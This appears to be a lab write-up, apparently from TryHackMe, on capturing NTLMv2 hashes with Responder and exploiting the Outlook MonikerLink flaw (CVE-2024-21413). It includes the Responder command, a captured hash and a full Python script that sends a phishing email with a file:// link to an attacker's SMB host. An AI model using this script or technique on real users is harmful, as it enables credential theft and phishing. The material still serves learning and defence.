## https://sploitus.com/exploit?id=D0C24AAD-9B58-52E4-84F7-D9B05A16FE0A
Project Goal:
The project was created to demonstrate the use of various tools for capturing NTLM hashes from users on a network and for executing phishing attacks using email. This showcases how network authentication vulnerabilities and phishing methods can be exploited to compromise systems.
Process Description
1. Capturing NTLM Hashes using Responder
Initially, I used the Responder tool to capture authentication hashes over the network. Responder allows intercepting queries such as LLMNR, NBT-NS, and MDNS to collect NTLM hashes of users. This is an important step for attacks aimed at gaining access to systems using captured hashes.
I ran the following command to start Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
I configured Responder to listen on the ens5 interface. It immediately began intercepting authentication requests, allowing me to view NTLM hashes from users on the network, such as THM-MONIKERLINK\tryhackme and WORKGROUP\Administrator. Here's how the output looked when capturing the hashes:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212
[SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme
[SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
These hashes can then be used for attacks such as brute force or hash attacks.
2. Phishing Emails with Exploit
Next, I created a phishing email containing a link to a malicious file. Using a Python script with the smtplib library, I sent the email to the victim's address. The email included an HTML link that appeared safe but actually led to a file designed to exploit a vulnerability.
The phishing link in the email looked like this:
<p><a href="file://10.10.192.145/test!exploit">Click me</a></p>
Here’s the full Python script used to send the phishing email:
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender_email = 'attacker@monikerlink.thm'
receiver_email = 'victim@monikerlink.thm'
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html> <html lang="en"> <p><a href="file://10.10.192.145/test!exploit">Click me</a></p> </html> """
message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html')
message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25)
server.ehlo()
try:
server.login(sender_email, password)
except Exception as err:
print(err)
exit(-1)
try:
server.sendmail(sender_email, [receiver_email], message.as_string())
print("\nEmail delivered")
except Exception as error:
print(error)
finally:
server.quit()
This script sends an email with a malicious link, which could potentially exploit the CVE-2024-21413 vulnerability.
Results
As a result, I was able to demonstrate two key aspects:
Capturing NTLM hashes using the Responder tool, which is a crucial step for attacking network authentication.
Phishing and exploiting vulnerabilities via email using the Python script. Sending phishing emails with malicious links can trick users and lead to system compromise.
This project showed how network vulnerabilities and phishing attacks can be exploited to gain access to systems. It also highlighted the importance of defending against such attacks through strong authentication methods and email traffic filtering.